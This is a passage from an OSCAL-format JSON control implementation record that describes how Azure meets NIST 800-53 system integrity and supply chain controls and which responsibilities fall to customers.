notify service engineer personnel upon discovery of discrepancies during integrity verification. Service engineer personnel are notified via email or the creation of DevOps tickets._x000D_ _x000D_ Servers_x000D_ _x000D_ The Windows Server operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files._x000D_ _x000D_ WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Azure uses the Config Policy Verifier (CPV) and Config Change Reporter (CCR) tools to notify the Azure Networking team on unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to Incident Management (IcM) regarding deviations of correct operations of security functions. CPV and CCR alert upon system startup and restart and continuously provides event monitoring and alerting to Azure Networking. CPV and CCR are near-real-time solutions that perform scanning on a continuous basis._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9b47eb2b-1f4a-46f3-9fca-cb275f7076ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"}],"description":"The customer is responsible for automatically shutting down or restarting customer-deployed resources, and/or implementing customer-defined security safeguards when integrity violations are discovered.","provided-uuid":"ae8e9fcf-2f7d-4742-b5aa-1be087a4c045"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2973a163-8f33-4aff-812c-284901495373","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.7","statements":[{"uuid":"7c237dae-936f-4779-9d83-1202eeed9328","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.7_smt","by-components":[{"uuid":"5233fe5f-cc51-4c52-b8fe-ac517b7c7c41","export":{"provided":[{"uuid":"4d328220-64f1-4022-b46a-6f745c6f9e67","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"}],"description":"Azure utilizes Azure Security Pack (AzSecPack) monitoring via Azure System Lockdown (AzSysLock) for unexpected running software - to alert on and in some cases block unsigned code from running in the environment. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident per Azure CEN. In addition, for servers, AzSecPack alerts on critical baseline changes. For network devices, the Config Policy Verifier (CPV) and Config Change Reporter (CCR) alerts on any changes not tied to a work ticket._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9e74eeda-4474-4f54-a822-6a1165a7b396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"}],"description":"The customer is responsible for incorporating the detection of unauthorized customer-defined security-relevant changes to customer-deployed resources into the incident response capability.","provided-uuid":"4d328220-64f1-4022-b46a-6f745c6f9e67"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0aedd26f-9b4c-44fa-a261-89760bcdf444","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.15","statements":[{"uuid":"87548f63-6ff2-4955-a332-dafc070cb803","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.15_smt","by-components":[{"uuid":"5ee893da-643b-4fce-8b98-7b9ec607a442","export":{"provided":[{"uuid":"b32640c5-7055-4e0f-b56b-a554d015e149","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"}],"description":"The Microsoft Security Response Center monitors for the use of penetration testing tools installed within the Azure backend, as these have the potential to cause damage to the environment if used maliciously. Alerts are sent out to security teams if accounts are used maliciously. Refer to security controls of AU-2, SI-3, and SI-4 for further details. Azure identifies software authorized to execute within Azure via configuration baselines and configuration scripts. Both baselines and scripts are version controlled and under configuration management. Only software included in a baseline or configuration script may be installed on Azure. Azure uses Azure Security Monitoring (ASM) and SCUBA to identify unauthorized software execution and alert appropriate personnel for further review. In addition to the standard release processes as part of OneBranch processes which includes build release verification steps such as virus scanning, in accordance with Microsoft Security Program Policy (MSPP), all software installed within Azure must have a valid signature. The Azure System Lockdown (AzSysLock) team uses AzSecPack to monitor for unexpected running software. This is defined as any software that is not signed using the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using signed code. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident. For services running Azure Security Pack (AzSecPack), the OS security configuration baseline is also monitored for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes. Additionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack."}],"responsibilities":[{"uuid":"46393e34-98e2-430d-b918-45578ce9b5ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"}],"description":"The customer is responsible for implementing cryptographic mechanisms to authenticate organization-defined software or firmware component prior to installation for customer-deployed resources.","provided-uuid":"b32640c5-7055-4e0f-b56b-a554d015e149"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cf2b5d67-f972-42fc-b57b-4316eb871af7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-8","statements":[{"uuid":"8182f62e-bc64-42f6-8f6e-136fda265f4b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8_smt.a","by-components":[{"uuid":"0b82b610-c3ca-4652-8aaf-ee001013e868","export":{"provided":[{"uuid":"ae0fb06e-c8ed-4b7d-a0fc-3511ef1025b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"}],"description":"Currently, Azure does not host mail servers for its customers._x000D_ _x000D_"}],"responsibilities":[{"uuid":"955d7468-1f6e-4343-a834-7f0982d2cf51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"}],"description":"The customer is responsible for employing spam protection at entry and exit points which detect and take action on unsolicited messages. Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"ae0fb06e-c8ed-4b7d-a0fc-3511ef1025b1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"79332245-854f-4011-8eea-2d5e42d2e37b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8_smt.b","by-components":[{"uuid":"b3d93edb-5686-4c08-97fa-2994be6fd893","export":{"provided":[{"uuid":"2f759b2a-9a9e-476b-8303-56cd37a5a2cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"}],"description":"Currently, Azure does not host mail servers for its customers._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e96c06d3-2b36-468e-b194-b99da5b8d571","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"}],"description":"The customer is responsible for updating spam protection in accordance with organization policy and procedures. Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"2f759b2a-9a9e-476b-8303-56cd37a5a2cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"36e31322-8969-435f-bb8a-20e27a1ecc49","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-8.2","statements":[{"uuid":"56c4f9e1-553b-443a-a9c3-af476bc29157","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8.2_smt","by-components":[{"uuid":"067db2d6-66e5-417e-a185-2c09e3a359a0","export":{"provided":[{"uuid":"a52436fe-6965-48f6-957a-62e5c6682716","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"}],"description":"Currently, Azure does not host mail servers for its customers._x000D_ _x000D_"}],"responsibilities":[{"uuid":"adeb1c3e-bbdf-46fb-b8da-71a40762ad15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"}],"description":"The customer is responsible for automatically updating spam protection. Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"a52436fe-6965-48f6-957a-62e5c6682716"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"42eeb4a4-b3a4-4944-bc08-b385cbac4804","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-10","statements":[{"uuid":"42ecf5dc-b3dd-4465-b58a-b11f0dc2d683","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-10_smt","by-components":[{"uuid":"950643ea-685e-4ed4-a33c-ded4c3785a36","export":{"provided":[{"uuid":"af141416-f56a-4aff-99de-62d0de55d026","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"}],"description":"Azure follows system development methodology and security guidelines outlined in the Microsoft Security Policy, and service teams adhere to the Security Development Lifecycle (SDL) requirements described in the common Online Services Secure Coding procedure. The SDL process addresses requirements around input data validation within services. Thorough code reviews and testing are completed during the Verification Phase of the SDL prior to software being put into a production environment. The code reviews and testing check for a number of coding errors, including, but not limited to, SQL injection, format string vulnerabilities, XSS, integer arithmetic, command injection, and buffer overflow vulnerabilities, and ensures the services are able to handle such scenarios in a predictable manner._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cff95913-9faa-422a-b427-943eb56f5327","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"}],"description":"The customer is responsible for information input validation for customer-deployed resources.","provided-uuid":"af141416-f56a-4aff-99de-62d0de55d026"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0fa73de-2114-4e64-9327-a817cc30e976","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-11","statements":[{"uuid":"337cf64b-57c2-4f22-9b21-d8cb4656c4d6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-11_smt.a","by-components":[{"uuid":"af6e83b6-5019-4dd7-9759-a910e242aa32","export":{"provided":[{"uuid":"7a363fad-5338-4e75-a0a1-5cf202a6edbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"}],"description":"As part of the Security Development Lifecycle (SDL) process, service teams ensure that error messages do not contain sensitive information such as username and password combinations, attributes used to validate a password reset request, personally identifiable information excluding unique username identifiers provided as a normal part of a transactional record, biometric data or personal characteristics used to authenticate identity, sensitive financial records such as account numbers or access codes, content related to internal security functions such as private encryption keys, white list or blacklist rules, or object permission attributes and settings. The error messages are generic in nature that provide limited information to assist the user in correcting the error. An example is \"the username or password is incorrect\" when there is an error logging into the application."}],"responsibilities":[{"uuid":"e0dc18f2-53dc-43ad-96b4-106202cae2ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"}],"description":"The customer is responsible for generating error messages to provide information necessary for corrective actions without revealing information that could be exploited by adversaries for customer-deployed resources.","provided-uuid":"7a363fad-5338-4e75-a0a1-5cf202a6edbe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f43f63cd-ffbd-422f-b73f-71b566bee5bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-11_smt.b","by-components":[{"uuid":"b991043c-f2ab-46c9-9acf-ac90ff22750c","export":{"provided":[{"uuid":"508ae2a6-a0db-416e-8daf-042931486202","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"}],"description":"Except for error messages displayed to unauthenticated users, such as a login failure notification, error messages are shown only to authorized users and communicated across Azure only. Error messages are not accessible to external parties and only communicated to authorized users._x000D_ _x000D_"}],"responsibilities":[{"uuid":"06d96da2-9aaf-4ea9-b72d-559e5eeccdec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"}],"description":"The customer is responsible for revealing the error messages defined in SI-11.a to only customer-defined personnel or roles.","provided-uuid":"508ae2a6-a0db-416e-8daf-042931486202"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0b8f9d36-7453-48ce-b6e5-c83f0de8b7a3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-12","statements":[{"uuid":"c468a72c-c3c5-4a59-9acd-862d652d1f03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-12_smt","by-components":[{"uuid":"f5c103d5-9a63-4a2d-877d-ae8fc0938f08","export":{"provided":[{"uuid":"c77cb4da-6e51-4a58-9d0a-5314cae5f6c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"}],"description":"Azure assets are retained as appropriate based on retention requirements set by Corporate Records Management and an asset's classification or based on contractual requirements. The Microsoft Asset Classification Standard, Data Classification Standard, and Asset Protection Standard describe the minimum security requirements that Azure personnel must apply to information assets based on their classification, including Low Value Asset (LVA), Moderate Value Asset (MVA), and High Value Asset (HVA). The Corporate Document Retention Schedule describes which Microsoft documents must be kept and for how long. Microsoft guarantees retention of customer data for thirty (30) days after termination. All information is permanently deleted ninety (90) days after termination of service. All Azure personnel responsible for managing and maintaining Azure assets ensure that assets are handled securely and provided with appropriate level of protection in accordance with the Asset Classification Standard, Data Classification Standard, and Asset Protection Standard. Microsoft assets are handled and retained in the following manner: * Information system documentation is accessible to Microsoft personnel via internal SharePoint sites. Individual service teams utilizing SharePoint are responsible for managing access to their own sites. * Operations assets are retained as appropriate based on retention requirements set by Corporate Records Management and the asset's classification as document within the Asset Classification Standard and Asset Protection Standard. * Operations assets are disposed of in accordance with the asset's retention requirements as set by Corporate Records Management."}],"responsibilities":[{"uuid":"bffdf7b4-4bc5-44f7-a675-d72eaaec427e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing and retaining information within customer-deployed resources and information output from those resources in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and operational requirements.","provided-uuid":"c77cb4da-6e51-4a58-9d0a-5314cae5f6c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c52a0902-64ea-4953-a101-cbd1ff3c5369","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-16","statements":[{"uuid":"1e9f14f0-7424-4e15-b4cb-55a8721dcae0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-16_smt","by-components":[{"uuid":"2ac7481d-9061-4509-848d-073ac80b2792","export":{"provided":[{"uuid":"8d94a71d-bcd2-4ac2-b969-0614146dba18","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"}],"description":"Azure uses Windows and Linux operating systems for its services. Both operating systems have protections in place for preventing code execution in restricted memory locations: No Execute (NX), Address Space Layout Randomization (ASLR), and Data Execution Prevention (DEP). Additionally, the Security Development Lifecycle (SDL) requires secure coding practices including explicit consideration for safe memory handling requirements._x000D_ _x000D_ See the following TechNet articles for more information about the protections:_x000D_ _x000D_ * <https://technet.microsoft.com/en-us/library/aa366553.aspx>_x000D_ * <https://technet.microsoft.com/en-us/library/bb457155.aspx>_x000D_ * <https://technet.microsoft.com/en-us/library/cc771361%28v=WS.10%29.aspx>_x000D_ * <https://wiki.ubuntu.com/Security/Features#nx>_x000D_ _x000D_"}],"responsibilities":[{"uuid":"3f2b594e-81ba-4137-ad7a-d147cad5c6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"}],"description":"The customer is responsible for protecting customer-deployed resources from unauthorized code execution.","provided-uuid":"8d94a71d-bcd2-4ac2-b969-0614146dba18"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5f5044ea-d5eb-4f49-a30b-31608ac314bc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-2","statements":[{"uuid":"9c186cef-8211-4bb2-85f2-8be12bcb0824","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.a","by-components":[{"uuid":"e716b741-06a8-4c26-9397-69b66baf16fe","export":{"provided":[{"uuid":"5ba478c3-6c68-4a47-a988-5b8a29679857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"}],"description":"Azure Supply Chain team has formulated a supply chain risk management plan document for managing supply chain risks associated with Azure cloud environments. The document is designed to address supply chain security and availability risks enabling Azure to comply against contractual and regulatory commitments."}],"responsibilities":[{"uuid":"0a30a91b-ff43-4990-95a4-876ef251a53d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"}],"description":"The customer is responsible for developing a plan for managing supply chain risks associated with research and development, design, and manufacturing, acquisition, delivery, integration, operations and maintenance, and disposal of customer-deployed resources.","provided-uuid":"5ba478c3-6c68-4a47-a988-5b8a29679857"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d71bd9c8-3afa-4788-aa52-6ca4d6ac5351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.b","by-components":[{"uuid":"6a725dfd-76b5-4da9-9bf8-cfc1069ff336","export":{"provided":[{"uuid":"7b739223-fd6f-4252-8c3e-e8c6debf9cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"}],"description":"Azure Supply Chain team works to ensure the supply chain risk management plan document is reviewed and updated on at least an annual basis or when there are significant changes requiring review. The document has a revision history table indicating when the document was last updated."}],"responsibilities":[{"uuid":"592d4f08-28b3-4576-a471-e12de9e4ad36","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"}],"description":"The customer is responsible for reviewing and updating supply chain risk management plan at customer-defined frequency and associated with customer-deployed resources.","provided-uuid":"7b739223-fd6f-4252-8c3e-e8c6debf9cd7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cd888f9b-4f53-464b-81dc-8cd2f2b9e142","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.c","by-components":[{"uuid":"8e64cfae-a866-4749-9f7b-a48b743395d4","export":{"provided":[{"uuid":"5db11a6d-15db-4928-86ba-5f46811a6347","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"}],"description":"The Azure Supply Chain team leverages a protected and access-controlled website to house the supply chain risk management plan. Personnel who have the required job responsibilities have access to website and all other personnel don't have access as role-based access control is enforced."}],"responsibilities":[{"uuid":"9c2e0cfc-c5b6-4ec9-8601-0ec1cfb31a59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"}],"description":"The customer is responsible for protecting the supply chain risk management plan from unauthorized disclosure and modification for customer-deployed resources.","provided-uuid":"5db11a6d-15db-4928-86ba-5f46811a6347"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d1ede367-d2db-40e5-9b5c-9a02e7b476ea","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-2.1","statements":[{"uuid":"8a75283d-eba2-4d86-b48d-c13f2c83473c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2.1_smt","by-components":[{"uuid":"8157f227-a9fa-4d80-ae98-655550d98918","export":{"provided":[{"uuid":"44f0c27e-2508-4f08-a238-3140871f689a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"}],"description":"As part of Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments."}],"responsibilities":[{"uuid":"0e144899-03cc-4aa0-ab01-5cbdae7d833d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"}],"description":"The customer is responsible for establishing a supply chain risk management team to support supply chain risk management activities for customer-deployed resources.","provided-uuid":"44f0c27e-2508-4f08-a238-3140871f689a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"33338d33-e324-4dbc-becc-4405d8c80821","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-3","statements":[{"uuid":"f6d6059f-6716-4cef-8388-8fab62b06ea9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.a","by-components":[{"uuid":"71948cae-cc95-4e7d-aaa7-91af77be4164","export":{"provided":[{"uuid":"2b55cc08-70da-4c49-9287-ebb4289853f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"}],"description":"Azure has established a process to identify and addresses weaknesses or deficiencies in supply chain elements supporting Azure cloud environments as described below. \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with 